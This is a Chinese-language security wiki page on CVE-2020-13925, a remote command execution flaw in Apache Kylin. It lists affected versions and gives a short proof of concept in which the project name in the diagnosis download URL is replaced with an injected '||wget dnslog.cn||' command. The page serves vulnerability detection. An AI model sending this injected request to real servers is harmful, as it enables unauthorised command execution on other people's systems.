menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right Middleware-Vulnerability-detection-master chevron_right Apache chevron_right CVE-2020-13925 Apache Kylin 远程命令执行漏洞
  • home 首页
  • brightness_4 暗黑模式
    • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    lightbulb_outline README

    CVE-2020-13925 Apache Kylin 远程命令执行漏洞

    影响版本:

    • 2.3.0 - 2.3.2
    • 2.4.0 - 2.4.1
    • 2.5.0 - 2.5.2
    • 2.6.0 - 2.6.4
    • 3.0.0-alpha, 3.0.0-alpha2, 3.0.0-beta, 3.0.0

    poc

    登录后访问 System-Configuration-Diagnosis,触发下载诊断信息的请求
http://host:port/kylin/api/diag/project/learn_kylin/download

GET
http://host:port/kylin/api/diag/project/||wget dnslog.cn||/download

即将项目名称“learn_kylin”替换为||cmd||

    @bit4woo